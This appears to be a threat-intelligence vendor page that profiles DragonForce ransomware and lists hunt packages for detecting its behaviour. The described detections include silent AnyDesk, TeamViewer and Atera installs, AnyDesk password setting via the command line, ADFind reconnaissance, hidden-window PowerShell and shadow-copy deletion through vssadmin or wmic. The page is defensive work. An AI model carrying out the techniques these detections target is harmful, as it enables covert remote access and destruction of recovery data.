Threat Overview - DragonForce Ransomware
DragonForce Ransomware is a malware strain that emerged in 2023 and operates under the Ransomware-as-a-Service (RaaS) model. The group behind DragonForce (under the same name) initially gained attention with politically motivated attacks, targeting entities that aligned with their ideological beliefs. Over time, they have pivoted to financially motivated extortion campaigns, making it a significant player in the ransomware sector. Their operations are structured to allow affiliates to launch attacks using DragonForce’s infrastructure and tools, with the ransomware’s customizable payloads, allowing affiliates to target a range of industries. As a result, the variant has been associated with a wide array of attacks globally, particularly affecting high-profile targets in the retail, financial, and manufacturing sectors across North America, Europe, and Asia.
DragonForce Ransomware Hunt Package Collection
TITAN References:
TITAN Info Report: Underground PerspectiveMajor UK retailers M&S, Co-op fall victim to cyberattacks
Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!
Related Hunt Packages
SplashTop RMM Command Line Install
This Threat Hunt package identifies attempts to install Splashtop Remote Monitoring and Management (RMM) software via command-line interfaces (CLI) or the Windows Installer (msiexec). Adversaries often use legitimate remote administration tools like Splashtop RMM to maintain persistent access to compromised systems, evade detection, and manage multiple infected machines.
Autorun or ASEP Registry Key Modification
A common method that adversaries and malicious software alike achieve persistence is by adding a program to the startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder allows the referenced program to be executed when a user logs in. They are often utilized for legitimate purposes, however when utilized maliciously the key name/value is often obviously suspicious, such as random names, or objects loaded from temp or public folders.
TeamViewer Service Installation - Potential Remote Management Tool Installation
This Hunt Package is intended to identify the service that is created when TeamViewer is installed utilizing its default service profile. Analysts should ensure to verify, following internal guidance, if TeamViewer is allowed in your environment before executing this Hunt Package.
DNS Query for TeamViewer Associated Domain by Non-Standard TeamViewer Process Name - Potential Defense Evasion
This Hunt Package is designed to uncover potentially renamed instances of TeamViewer or other defense evasion techniques to mask the use of TeamViewer. The provided query logic excludes common processes associated with TeamViewer and looks for DNS requests to TeamViewer associated domains. Analysts should ensure to verify, following internal guidance, if TeamViewer is allowed in your environment before executing this Hunt Package.
ACCESS HUNT PACKAGE
Active Directory Discovery and Reconnaissance - ADFind.exe Execution
This provided logic is designed to identify when ADFind.exe is executed with common flags and designations related to Active Directory enumeration and reconnaissance. Examples would be utilizing AdFind to enumerate users on a domain or enumerate administrators on a domain in an attempt to identify potential targets within the organization.
TeamViewer Execution from Abnormal Folder - Potential Malicious Use of RMM Tool
TeamViewer is a common and widely utilized tool for remotely controlling machines. It has been adopted by many actors to remotely access victim machines and deploying additional malware or ransomware payloads. This Hunt Package is designed to exclude common paths where TeamViewer is executed from. Due to TeamViewer being able to be installed or executed from nearly any directory, Analysts should review whether TeamViewer is allowed, and follow internal policies if it is not authorized. Some common "red flag" type directories can be temporary directories (C:\\Temp) or even System32. Additionally, to appear more legitimate, some attackers may utilize installation paths that include legitimate sounding names, such as "Microsoft Management" or "Customer Service”.
TeamViewer Binary File Write - Potential TeamViewer Installation or Usage
This Hunt Package is designed to identify the common files associated with Team Viewer installation or download. This would often be considered a policy violation in most organizations. It is important to note the difference in the files and what they are associated with. The setup file is associated with the download of TeamViewer, while the service associated binary is written after successful installation of TeamViewer. Lastly, the Desktop application is written after setup as well, but may not always be written, depending on which method of installation is chosen.
Atera Agent utilized for Unauthorized Remote Access
This package identifies when the Atera Agent is installed for remote connectivity by looking for key registry values or command line arguments used to install and register the agent to an unauthorized account. This package uses different artifacts in order to identify this behavior. Check out the 'Deployment Requirements' section for each tool in order to understand the limitations or requirements.
Potential UEFI Volume Tampering via BCDEdit Boot Configuration Changes
The Threat Hunt Package is designed to identify process execution activities common in UEFI bootkit attacks, a type of malware that targets the motherboard's UEFI firmware. The package focuses on the use of bcdedit, a command-line tool, to monitor changes in the system boot configuration, a common target for UEFI bootkits.
AnyDesk Silent Installation - Potential Malicious RMM Tool Installation
Identifies when AnyDesk is installed utilizing the silent method as to not prompt or show any details to the user logged into the system. This can be done by malware to automate the installation process, without letting the user know its been installed.
Remote Atera Agent Download - Command Line
This Threat Hunt package identifies when a tool like a lolbin is used to fetch the Atera's Remote Montoring and Management (RMM) agent directly from Atera's distribution domain.
Remote Atera Agent Download - Web
This Threat Hunt package identifies when the Atera's Remote Montoring and Management (RMM) agent is downloaded directly from Atera's distribution domain.
Malicious PowerShell Process - Connect To Internet With Hidden Window
This use case is meant to identify PowerShell processes started with parameters meant to modify the execution policy of the run, run in a hidden window, and connect to the Internet. This combination of command-line options is suspicious because it's overriding the default PowerShell execution policy, attempts to hide its activity from the user, and connects to the Internet.
AnyDesk Password Set Via CLI - Potential Malicious RMM Tool Installation
Threat actors wishing to install AnyDesk in the background and set a password for it to be logged into, will utilize the command flag --set-password after echoing the password to be set for the installation. This Hunt Package attempts to identify when a password is set for AnyDesk via the CLI. This is an uncommon practice for most users as it will often be configured in the UI instead of by running a command.
AnyDesk Service Installation - Potentially Malicious RMM Tool Installation
Identifies when the AnyDesk service is installed onto a system. This can be legitimate if the organization allows AnyDesk, however if it is not a commonly utilized application, any service installations should be considered suspect.
Shadow Copies Deletion Using Operating Systems Utilities
Ransomware is known to delete Windows shadow copies before it begins encrypting the data on the victim host. This tactic is typically carried out with powershell, vssadmin or wmic. This package identifies activity by powershell, wmic, vssadmin or vssvc with command line arguments containing delete and variations of shadow.
